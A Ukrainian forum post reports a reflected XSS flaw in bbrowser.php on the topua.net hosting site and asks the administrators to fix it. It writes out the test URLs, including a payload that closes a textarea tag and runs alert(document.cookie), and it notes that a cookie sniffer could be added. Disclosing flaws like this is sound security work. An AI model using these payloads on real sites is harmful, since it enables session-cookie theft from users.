Всім привіт! Усі завжди знали що наш хостинг - найкращий, найзручніши, проте чи найбезпечніший.
Зайшовши на форум вирішив переглянути варіанти кнопочок. Натрапив на сторінку:
http://www.topua.net/bbrowser.php?Клацнувши на одну з кнопок побачив адресу у браузері:
http://www.topua.net/bbrowser.php?file=topua.net.slavutka.gifВідразу промайнула думка про ін'єкцію. Згадавши що мій сайт нещодавно був взломаний саме (як мені пояснювали) через хоситинг, вирішив перевірити на вразливість.
Я підставив:
http://www.topua.net/bbrowser.php?file='
Але ін'єкції небуло. Проте зміналась інформація в <textarea></textarea>
Було зрозуміло що це XSS.
Я підставив:
http://www.topua.net/bbrowser.php?file=%3Cscript%3Ealert()%3C/script%3E
Знову нічого. Все стало зрозуміло: потрібно примусово закрити тег <textarea>
Що я і зробив:
http://www.topua.net/bbrowser.php?file=%3C/textarea%3E%3Cscript%3Ealert()%3C/script%3E
На цейраз виліз безвинний алерт.
Добавив вивід кукісів форуму:
http://www.topua.net/bbrowser.php?file=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Добавивши сніффер можна діл натворити...
Тож прошу адміністрацію переглянути деякі скрипти у плані безпеки. Користувачам буде зручніше.
Дякую, що вислухали мене.
Вхід
Реєстрація
Допомога
Пошук
Але, нажаль, на лінукс софту мало, і це найбільша його проблема 
Типова думка юзера Windows. Вам мало 10 000 у одному дистрибутиві? Ну то докачайте ще.